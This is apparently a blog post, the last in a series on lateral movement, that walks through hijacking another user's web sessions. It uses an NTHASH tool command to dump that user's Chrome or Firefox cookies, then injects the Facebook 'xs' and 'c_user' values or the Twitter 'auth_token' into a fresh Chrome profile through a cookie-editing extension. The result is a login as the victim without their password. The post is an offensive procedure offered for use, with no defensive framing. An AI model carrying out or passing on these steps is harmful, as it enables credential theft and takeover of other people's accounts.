This is the 9th and last article of a series of articles around performing lateral movement.
Goal is still about performing a task as another user but without knowing that user password.
This time, lets take a look at « cookies« .
Quoting Wikipedia : « …is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing… ».
1.Based on previous articles, lets consider you have acquired a context/shell running as another user.
2.Retrieve the chrome cookie you are after with NTHASH-win64.exe /ccookies | findstr /i facebook.com or the firefox cookie you are after with NTHASH-win64.exe /fcookies | findstr /i facebook.com
3.Launch a chrome with a new/blank profile (in your session) : « C:\Program File
s (x86)\Google\Chrome\Application\chrome » –profile-directory= »temp »
4.Install a « cookie » chrome extension like EditThisCookie
5.Inject the cookie:
-in facebook case, you need to inject value xs and c_user
-in twitter case, you need to inject auth_token
And here you go, you can log into a web service, as another user, without knowing his credentials.
Note that this method may not be 100% bullet proof :
-you need to know which value(s) you need to inject
-some web services may perform extra checks